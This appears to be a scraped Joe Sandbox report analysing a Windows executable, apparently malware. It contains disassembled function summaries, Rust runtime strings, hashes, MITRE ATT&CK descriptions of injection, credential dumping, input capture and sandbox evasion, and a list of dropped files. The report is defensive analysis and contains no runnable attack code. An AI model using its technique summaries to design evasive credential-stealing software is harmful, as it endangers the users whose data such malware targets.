Instruction ID: 0fb263832dd87b93ed0243f3fb8e241fb84cf10bbcf682092cab34fba533ddef
Opcode Fuzzy Hash: e4aada9366b14b73b8ce31abc81888b59a013a0339b8672aa1d4467bc022593b
Instruction Fuzzy Hash: 78419F71F04A46B6FB18DB69A8443F92366AB8479CF408537CA5E92B94DF3CB146C340

Function 00007FF6B197B930 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 81memorythreadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,?,00007FFE221D25A0,?,?,00007FF6B19A3A98), ref: 00007FF6B197B968
HeapFree.KERNEL32(?,?,?,?,00007FFE221D25A0,?,?,00007FF6B19A3A98), ref: 00007FF6B197B9C3
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00007FFE221D25A0,?,?,00007FF6B19A3A98), ref: 00007FF6B197BA2D

Strings

assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\mpsc\queue.rs, xrefs: 00007FF6B197B9D9
assertion failed: (*next).value.is_some(), xrefs: 00007FF6B197B9F1

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$SwitchThread
String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\mpsc\queue.rs
API String ID: 4159854540-163026437
Opcode ID: a710f5a7dee72b88f01131b0f135dbe6e3327decf9c04b523c9ccbd28b4c43e5
Instruction ID: 067b513efb352ac674ed49b359d59f56d3fc1f46540a511f79908135fc191941
Opcode Fuzzy Hash: a710f5a7dee72b88f01131b0f135dbe6e3327decf9c04b523c9ccbd28b4c43e5
Instruction Fuzzy Hash: 9B312F66A04B86E5FB14AB5AD4802B96770EF84BACF548533CF6D937A5DF38E491C300

Function 00007FF6B192538A Relevance: 7.9, APIs: 5, Instructions: 407encryptionmemoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B1924AD9
CertDuplicateCertificateContext.CRYPT32 ref: 00007FF6B1925A77
CertDuplicateStore.CRYPT32 ref: 00007FF6B1925A9D
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B1926020
CertCloseStore.CRYPT32 ref: 00007FF6B192602F
HeapFree.KERNEL32 ref: 00007FF6B1928630

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Cert$Free$CertificateContextDuplicateHeapStore$Close
String ID:
API String ID: 2417489733-0
Opcode ID: 05d99cf41b592577dcdea3b6876ca36123af9ad48950a9ced92dbbffdf2f5ef2
Instruction ID: cf597a0b0ce57d67e9db882fd8035df7fe933e48b9fb2e755437f1b22f89b86f
Opcode Fuzzy Hash: 05d99cf41b592577dcdea3b6876ca36123af9ad48950a9ced92dbbffdf2f5ef2
Instruction Fuzzy Hash: 10224662A08BC691E7429F29D4453E937A4FB99B8CF089236DF8D4B356DF38E584C350

Function 00007FF6B19D9810 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 191memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B19D8FF0: HeapFree.KERNEL32(?,?,?,?,?,?,00007FF6B19D9895), ref: 00007FF6B19D902F

HeapFree.KERNEL32 ref: 00007FF6B19D9A3A
HeapFree.KERNEL32 ref: 00007FF6B19D9A56

Strings

A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi, xrefs: 00007FF6B19D9AD4
driver missing, xrefs: 00007FF6B19D9A7C
core missing, xrefs: 00007FF6B19D9AB6

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID: A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi$core missing$driver missing
API String ID: 3298025750-269034672
Opcode ID: fdc1f56bb7d1fe0b98ebd03b7ee916d309b72778f1e85bec7d9c85074e5fbca3
Instruction ID: 729795df366cb5206f049e3233293016f58b94889b0914d282ba5342c887735f
Opcode Fuzzy Hash: fdc1f56bb7d1fe0b98ebd03b7ee916d309b72778f1e85bec7d9c85074e5fbca3
Instruction Fuzzy Hash: D7A15C62A08B82A5EB25AF29D5403B827B0FB5476CF149632DF5D8369ADF38E1D5C340

Function 00007FF6B19A94D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF6B19E21F0), ref: 00007FF6B19A9506
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF6B19E21F0), ref: 00007FF6B19A96A1

Strings

overflow when subtracting durations, xrefs: 00007FF6B19A9657
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6B19A96BF

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: ErrorFrequencyLastPerformanceQuery
String ID: called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
API String ID: 3362413890-1633623230
Opcode ID: 7900dad1f80698e40440a6aaf086947275cf4e077402888095b66adde3c7a090
Instruction ID: dcd2b9dee7c309b0a0369f7b0bf388c16e1486e00834e083096979bb058a05ca
Opcode Fuzzy Hash: 7900dad1f80698e40440a6aaf086947275cf4e077402888095b66adde3c7a090
Instruction Fuzzy Hash: BF513721F2879365FB15EB6CE9447B92365BF8439CF509136DF0F82A98DE3CA589C200

Function 00007FF6B1915470 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 135COMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B19155AF

Strings

Mutexdata<locked>, xrefs: 00007FF6B1915498
poisonedC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\mio-1.0.3\src\sys\windows\iocp.rs, xrefs: 00007FF6B19155CB
{ .. }, .. }..(core\src\fmt\num.rs, xrefs: 00007FF6B191561C

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: AddressSingleWake
String ID: { .. }, .. }..(core\src\fmt\num.rs$Mutexdata<locked>$poisonedC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\mio-1.0.3\src\sys\windows\iocp.rs
API String ID: 3114109732-2861239197
Opcode ID: 1969039f1badc7f2fd4c99a33d76fd739fcfbe3e53b5858003dfd27d0d6d1103
Instruction ID: 3607d42d9e0fddee8ad3b4e7744b1c81eef22c6a7f488c8ccdeba6c3338bf748
Opcode Fuzzy Hash: 1969039f1badc7f2fd4c99a33d76fd739fcfbe3e53b5858003dfd27d0d6d1103
Instruction Fuzzy Hash: CC618022A08B97B9FB209B69E4403AD3765BB0675CF404536CB4D87B95DF7CE199C340

Function 00007FF6B190B860 Relevance: 6.5, APIs: 2, Strings: 2, Instructions: 454memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B1A051D6), ref: 00007FF6B190B90F
HeapReAlloc.KERNEL32(?,?,?,?,?,?,?,00007FF6B1A051D6), ref: 00007FF6B190B9E1

Part of subcall function 00007FF6B190B0F0: HeapFree.KERNEL32(?,?,00000000,?,?,FFFFFFFE,?,00007FF6B190BB04,?,?,?,?,?,?), ref: 00007FF6B190B199

Strings

capacity overflow, xrefs: 00007FF6B190BC17, 00007FF6B190BEBB
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6B190BA51

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Heap$Free$Alloc
String ID: called `Result::unwrap()` on an `Err` value$capacity overflow
API String ID: 3901518246-2618782069
Opcode ID: 71b8e0ce003a2932a26f12323d1be1f85f8ff73caacd804fdfea98456eac100f
Instruction ID: 66985bd48a020e56acf89a878097731e30d0a631db1c9627b435932494f50b9e
Opcode Fuzzy Hash: 71b8e0ce003a2932a26f12323d1be1f85f8ff73caacd804fdfea98456eac100f
Instruction Fuzzy Hash: 11F1F6A6B096C6E2EB149B1AD8083B96792BB05BECF444532DF2F877D5DE3CE5418340

Function 00007FF6B18CB3C0 Relevance: 6.4, APIs: 5, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18CAFCF,?,?,?,?,?,?,00007FF6B18CAA0B), ref: 00007FF6B18CB41E
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18CAFCF,?,?,?,?,?,?,00007FF6B18CAA0B), ref: 00007FF6B18CB43E
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18CAFCF,?,?,?,?,?,?,00007FF6B18CAA0B), ref: 00007FF6B18CB4BD
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18CAFCF,?,?,?,?,?,?,00007FF6B18CAA0B), ref: 00007FF6B18CB4DB
HeapFree.KERNEL32(?,?,?,?,?,?,?,00007FF6B18CAFCF,?,?,?,?,?,?,00007FF6B18CAA0B), ref: 00007FF6B18CB54D

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7cf5edfc25288dab3953b3bbc3f997f0e014497a457a3693372a1573cc57f7ce
Instruction ID: 08bc32c708c0792e43457d68f0bac0d157daef90cb2e56cc27dcf4db6f0f2ed6
Opcode Fuzzy Hash: 7cf5edfc25288dab3953b3bbc3f997f0e014497a457a3693372a1573cc57f7ce
Instruction Fuzzy Hash: CC510F76B08E9595EB15CB6AE4843BD67A0FB84BA8F444532CF5D933A4CE38E485C340

Function 00007FF6B18E7410 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 437COMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B18E74B5
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B18E7516

Strings

core missing, xrefs: 00007FF6B18E7BE3

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: AddressSingleWake
String ID: core missing
API String ID: 3114109732-2546421206
Opcode ID: d95d137f68aab8ef0d317b5ba3cef56007f8d91564faf2f07f30a99ae4687f53
Instruction ID: 5be47bd3e6e9d6a9dffa642ae05dfff6a7e49c98b3e41c587815f197ee69143d
Opcode Fuzzy Hash: d95d137f68aab8ef0d317b5ba3cef56007f8d91564faf2f07f30a99ae4687f53
Instruction Fuzzy Hash: 3B325D32A18B86A9EB619F2DE8803F827A0FB5475CF144236DB4D87795DF39E685C340

Function 00007FF6B18F98C0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B18F9A14

Strings

buffer space exhausted; sending this messages would overflow the state, xrefs: 00007FF6B18F9BBA
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6B18F9B82

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: AddressSingleWake
String ID: buffer space exhausted; sending this messages would overflow the state$called `Result::unwrap()` on an `Err` value
API String ID: 3114109732-1228284763
Opcode ID: eab8866dcb2a05fb7c2a86698e5a31ab276cbde74f6d4782fadcef010224b4d1
Instruction ID: 69cab69e8cc25591115899422f1e37fb56a90ca9facf75327514aa01a467bf2b
Opcode Fuzzy Hash: eab8866dcb2a05fb7c2a86698e5a31ab276cbde74f6d4782fadcef010224b4d1
Instruction Fuzzy Hash: 08A1BF22E08B8599EB118F28D4113B837A0FB9979CF448635EFAC53399DF38E195C390

Function 00007FF6B18E3600 Relevance: 5.1, APIs: 4, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,00007FF6B18D79DB,?,00007FF6B18C3DB2), ref: 00007FF6B18E3649
HeapFree.KERNEL32(?,?,?,?,?,?,00007FF6B18D79DB,?,00007FF6B18C3DB2), ref: 00007FF6B18E368B
HeapFree.KERNEL32(?,?,?,?,?,?,00007FF6B18D79DB,?,00007FF6B18C3DB2), ref: 00007FF6B18E3703

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 34df6b9b78ea9868fb7d530679b67231b6b6c91e5f1b7e1ab06fa678dd12dac3
Instruction ID: 930346ddc310d0e13fefc35eae0da8fd24108ad3eeb62d544d225102ec79494e
Opcode Fuzzy Hash: 34df6b9b78ea9868fb7d530679b67231b6b6c91e5f1b7e1ab06fa678dd12dac3
Instruction Fuzzy Hash: 59410766A05B85E6EB509B6AE8443EC2771FB49B98F108537CF5D537A4CF38D688C340

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report xoJxSAotVM.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\GDT0R9H4EU37\4WTRQQ

C:\ProgramData\GDT0R9H4EU37\58GD2V

C:\ProgramData\GDT0R9H4EU37\6PH4O8

C:\ProgramData\GDT0R9H4EU37\GVAAAA

C:\ProgramData\GDT0R9H4EU37\GVAAAAAIE

C:\ProgramData\GDT0R9H4EU37\HLNYCB

